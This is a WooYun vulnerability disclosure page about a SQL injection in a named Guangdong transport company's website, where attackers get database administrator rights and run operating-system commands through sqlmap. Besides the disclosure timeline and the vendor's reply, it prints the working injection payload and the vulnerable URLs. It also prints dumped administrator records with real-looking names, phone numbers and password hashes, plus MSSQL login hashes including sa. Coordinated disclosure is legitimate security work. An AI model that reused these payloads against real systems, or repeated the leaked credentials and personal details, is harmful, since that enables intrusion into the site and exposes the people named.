当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099663

漏洞标题:广东省粤运交通公司惊现sa权sqlmap执行os-shell

相关厂商:广东省信息安全测评中心

漏洞作者: 千斤拨四两

提交时间:2015-03-06 11:57

修复时间:2015-04-20 14:22

公开时间:2015-04-20 14:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-06: 细节已通知厂商并且等待厂商处理中
2015-03-10: 厂商已经确认,细节仅向厂商公开
2015-03-20: 细节向核心白帽子及相关领域专家公开
2015-03-30: 细节向普通白帽子公开
2015-04-09: 细节向实习白帽子公开
2015-04-20: 细节向公众公开

简要描述:

sa权限注射sqlmap执行os-shell

详细说明:

url:http://www.gdyueyun.com/Stage/AnnualReport.aspx
头信息:
head%24txtSearch=&hiddMonth=-1%27%20or%2081%20%3d%20%2779&hiddYear=&ImageButton1=&month=0&scSelect=0&txtNewsTitle=&year=0&__EVENTARGUMENT=2&__EVENTTARGET=AspNetPager1&__EVENTVALIDATION=%2FwEWBwKwnOfjBgL36NysAwKH9IrBDgKztZisCQLSwpnTCALU2ry8DQKQvbK%2FC%2FzsTfgMNb%2BI502%2BB%2BSEpKtxX49V&__VIEWSTATE=%2FwEPDwUJMTc4MTgxNDI1D2QWAgIBD2QWBmYPZBYEAgMPFgIeCWlubmVyaHRtbAUP5Yqg5YWl5pS26JeP5aS5ZAIEDxYCHwAFDOiuvuS4uummlumhtWQCBg8WAh4LXyFJdGVtQ291bnQCCRYSZg9kFghmDxUBCjIwMTQtMDktMDJkAgEPFQMlYW5udWFscmVwb3J0LTAtMjAxNDA5MDIxMjMzMDEyMDc4LnBkZhMyMDE05bm05Lit5pyf5aCx5ZGKCe%2B8iHBkZu%2B8iWQCAg8VAyVhbm51YWxyZXBvcnQtMS0yMDE0MDkwMjEyMzMwMTIwNzgucGRmFEludGVyaW0gUmVwb3J0IDIwMTQgCe%2B8iHBkZu%2B8iWQCAw8VAyVhbm51YWxyZXBvcnQtMi0yMDE0MDkwMjEyMzMwMTIwNzgucGRmEzIwMTTlubTkuK3mnJ%2FloLHlkYoJ77yIcGRm77yJZAIBD2QWCGYPFQEKMjAxNC0wNC0xN2QCAQ8VAyVhbm51YWxyZXBvcnQtMC0yMDE0MDQxNzEyMjkxMTU4MDYucGRmDTIwMTPlubTlubTloLEJ77yIcGRm77yJZAICDxUDJWFubnVhbHJlcG9ydC0xLTIwMTQwNDE3MTIyOTExNTgwNi5wZGYSQW5udWFsIFJlcG9ydCAyMDEzCe%2B8iHBkZu%2B8iWQCAw8VAyVhbm51YWxyZXBvcnQtMi0yMDE0MDQxNzEyMjkxMTU4MDYucGRmDTIwMTPlubTlubTloLEJ77yIcGRm77yJZAICD2QWCGYPFQEKMjAxMy0wOS0wNWQCAQ8VAyVhbm51YWxyZXBvcnQtMC0yMDE0MDExNDEwNTExMjgxNDEucGRmEDIwMTPkuK3mnJ%2FmiqXlkYoJ77yIcGRm77yJZAICDxUDJWFubnVhbHJlcG9ydC0xLTIwMTQwMTE0MTA1MTEyODE0MS5wZGYTMjAxMyBJbnRlcmltIFJlcG9ydAnvvIhwZGbvvIlkAgMPFQMlYW5udWFscmVwb3J0LTItMjAxNDAxMTQxMDUxMTI4MTQxLnBkZhAyMDEz5Lit5pyf5aCx5ZGKCe%2B8iHBkZu%2B8iWQCAw9kFghmDxUBCjIwMTMtMDQtMTFkAgEPFQMlYW5udWFscmVwb3J0LTAtMjAxNDAxMTQxMDMwNTc2NjA2LnBkZgoyMDEy5bm05oqlCe%2B8iHBkZu%2B8iWQCAg8VAyVhbm51YWxyZXBvcnQtMS0yMDE0MDExNDEwMzA1NzY2MDYucGRmEjIwMTIgQW5udWFsIFJlcG9ydAnvvIhwZGbvvIlkAgMPFQMlYW5udWFscmVwb3J0LTItMjAxNDAxMTQxMDMwNTc2NjA2LnBkZgoyMDEy5bm05aCxCe%2B8iHBkZu%2B8iWQCBA9kFghmDxUBCjIwMTItMDgtMzFkAgEPFQMlYW5udWFscmVwb3J0LTAtMjAxNDAxMTQxMDM3MzA0NzYxLnBkZhAyMDEy5Lit5pyf5oql5ZGKCe%2B8iHBkZu%2B8iWQCAg8VAyVhbm51YWxyZXBvcnQtMS0yMDE0MDExNDEwMzczMDQ3NjEucGRmEzIwMTIgSW50ZXJpbSBSZXBvcnQJ77yIcGRm77yJZAIDDxUDJWFubnVhbHJlcG9ydC0yLTIwMTQwMTE0MTAzNzMwNDc2MS5wZGYQMjAxMuS4reacn%2BWgseWRignvvIhwZGbvvIlkAgUPZBYIZg8VAQoyMDEyLTA0LTE3ZAIBDxUDJWFubnVhbHJlcG9ydC0wLTIwMTQwMTE0MTAyODQyNzQ3OS5wZGYKMjAxMeW5tOaKpQnvvIhwZGbvvIlkAgIPFQMlYW5udWFscmVwb3J0LTEtMjAxNDAxMTQxMDI4NDI3NDc5LnBkZhIyMDExIEFubnVhbCBSZXBvcnQJ77yIcGRm77yJZAIDDxUDJWFubnVhbHJlcG9ydC0yLTIwMTQwMTE0MTAyODQyNzQ3OS5wZGYKMjAxMeW5tOWgsQnvvIhwZGbvvIlkAgYPZBYIZg8VAQoyMDExLTA5LTA1ZAIBDxUDJWFubnVhbHJlcG9ydC0wLTIwMTQwMTE0MTAyNzUxNTMzMC5wZGYQMjAxMeS4reacn%2BaKpeWRignvvIhwZGbvvIlkAgIPFQMlYW5udWFscmVwb3J0LTEtMjAxNDAxMTQxMDI3NTE1MzQwLnBkZhMyMDExIEludGVyaW0gUmVwb3J0Ce%2B8iHBkZu%2B8iWQCAw8VAyVhbm51YWxyZXBvcnQtMi0yMDE0MDExNDEwMjc1MTUzNDAucGRmEDIwMTHkuK3mnJ%2FloLHlkYoJ77yIcGRm77yJZAIHD2QWCGYPFQEKMjAxMS0wNC0yMGQCAQ8VAyVhbm51YWxyZXBvcnQtMC0yMDE0MDExNDEwMjcyOTY0NTcucGRmCjIwMTDlubTmiqUJ77yIcGRm77yJZAICDxUDJWFubnVhbHJlcG9ydC0xLTIwMTQwMTE0MTAyNzI5NjQ1Ny5wZGYSMjAxMCBBbm51YWwgUmVwb3J0Ce%2B8iHBkZu%2B8iWQCAw8VAyVhbm51YWxyZXBvcnQtMi0yMDE0MDExNDEwMjcyOTY0NTcucGRmCjIwMTDlubTloLEJ77yIcGRm77yJZAIID2QWCGYPFQEKMjAxMC0wOS0wOWQCAQ8VAyVhbm51YWxyZXBvcnQtMC0yMDE0MDExNDEwMjY1NjMwMzgucGRmEDIwMTDkuK3mnJ%2FmiqXlkYoJ77yIcGRm77yJZAICDxUDJWFubnVhbHJlcG9ydC0xLTIwMTQwMTE0MTAyNjU2MzAzOC5wZGYTMjAxMCBJbnRlcmltIFJlcG9ydAnvvIhwZGbvvIlkAgMPFQMlYW5udWFscmVwb3J0LTItMjAxNDAxMTQxMDI2NTYzMDM4LnBkZhAyMDEw5Lit5pyf5aCx5ZGKCe%2B8iHBkZu%2B8iWQCBw8PFgIeC1JlY29yZGNvdW50AhIWAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUMSW1hZ2VCdXR0b24x92QSouXQ%2FHdF9FwtW5invkVssVE%3D


http://www.gdyueyun.com/Stage/SearchPage.aspx?key
words=1*&languagetype=sc


庞大的数据库:

available databases [17]:
[*] CopyOfRisk
[*] CopyOfRisk_0
[*] IGKICPOS
[*] master
[*] model
[*] msdb
[*] pams
[*] pams0720
[*] pams2
[*] PAMS_AddonsInfo
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] Test
[*] testny
[*] Web_YueYunTraffic
[*] Web_YueYunTraffic_Test
Database: Web_YueYunTraffic
[26 tables]
+-----------------------+
| AboutSafety           |
| AdminMenu             |
| AdminPageFunction     |
| Administrator         |
| AnnualReport          |
| CompanyGovernment     |
| ContactUs             |
| CultureGlimpse        |
| Custom                |
| EnterpriseBulletin    |
| EnterprisePublication |
| FinancialHighlights   |
| IndependentBuild      |
| IndustryNews          |
| LZBuild               |
| MembersNews           |
| Multilingual          |
| News                  |
| PFGarden              |
| PageFunction          |
| PartyBuild            |
| PoliciesRegulation    |
| PromotionalMaterial   |
| SocietySound          |
| Sys_Menu              |
| YouthActivity         |
+-----------------------+
Database: Web_YueYunTraffic
Table: Administrator
[12 columns]
+---------------+
| Column        |
+---------------+
| AddTime       |
| AdminAdress   |
| AdminAge      |
| AdminEmail    |
| AdminID       |
| AdminName     |
| AdminPhoneNum |
| AdminPwd      |
| AdminSex      |
| AdminStatus   |
| AdminTrueName |
| Type          |
+---------------+
Database: Web_YueYunTraffic
Table: Administrator
[4 entries]
+---------+------+----------------------------+----------+----------------------------------+----------+-----------+------------------+-------------+-------------+---------------+---------------+
| AdminID | Type | AddTime                    | AdminAge | AdminPwd                         | AdminSex | AdminName | AdminEmail       | AdminStatus | AdminAdress | AdminPhoneNum | AdminTrueName |
+---------+------+----------------------------+----------+----------------------------------+----------+-----------+------------------+-------------+-------------+---------------+---------------+
| 1       | NULL | 10 17 2013 12:00AM         | 22       | 2AE68513F220DD72CE11F392A1EBB627 | 0        | admin     | [email protected] | 0           | NULL        | 15802704163   | 管理员           |
| 11      | NULL | 01 \\?a08 2014 \\?a02:40PM | 23       | F583737E562A35F3F49AFD2A60669F79 | 1        | zhengquan | [email protected]     | 0           | NULL        | 13562234523   | 证券            |
| 12      | NULL | 01 \\?a08 2014 \\?a02:40PM | NULL     | E10ADC3949BA59ABBE56E057F20F883E | 1        | zhangyang | NULL             | 0           | NULL        | 15802704163   | 张阳            |
| 14      | NULL | 04 \\?a08 2014 \\?a09:28AM | 26       | E10ADC3949BA59ABBE56E057F20F883E | 1        | wulan     | [email protected]  | 0           | NULL        | 13579023214   | 吴兰            |
+---------+------+----------------------------+----------+----------------------------------+----------+-----------+------------------+-------------+-------------+---------------+---------------+


下面是mssql数据库的用户名密码:

database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f
        header: 0x0100
        salt: 3869d680
        mixedcase: adf63db291c6737f1efb8e4a481b02284215913f
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f
        header: 0x0100
        salt: 8d22a249
        mixedcase: df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f
[*] nwbackup [1]:
    password hash: 0x0100c0667d50c359b5ae8e66762d23850539836bbc2149c5e5f7
        header: 0x0100
        salt: c0667d50
        mixedcase: c359b5ae8e66762d23850539836bbc2149c5e5f7
[*] PrimaryLogin [1]:
    password hash: 0x01005c4eb6d69b799ca92ecb8b0805c47a0fe2065cb6a18d0749
        header: 0x0100
        salt: 5c4eb6d6
        mixedcase: 9b799ca92ecb8b0805c47a0fe2065cb6a18d0749
[*] sa [1]:
    password hash: 0x010056049b0eb242f19e81bb1e42a4c38cc6dfea6709b43bda44
        header: 0x0100
        salt: 56049b0e
        mixedcase: b242f19e81bb1e42a4c38cc6dfea6709b43bda44

漏洞证明:

下面是一些截图证明:

sasa.png


证明当前为sa权限用户True
mssql有5个用户:

user.png


da.png


sqlmap执行os-shell:

os.jpg

修复方案:

你们修,赶紧修吧!!!

版权声明:转载请注明来源 千斤拨四两@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-03-10 09:56

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:11
正在联系相关网站管理单位处置。

最新状态:

暂无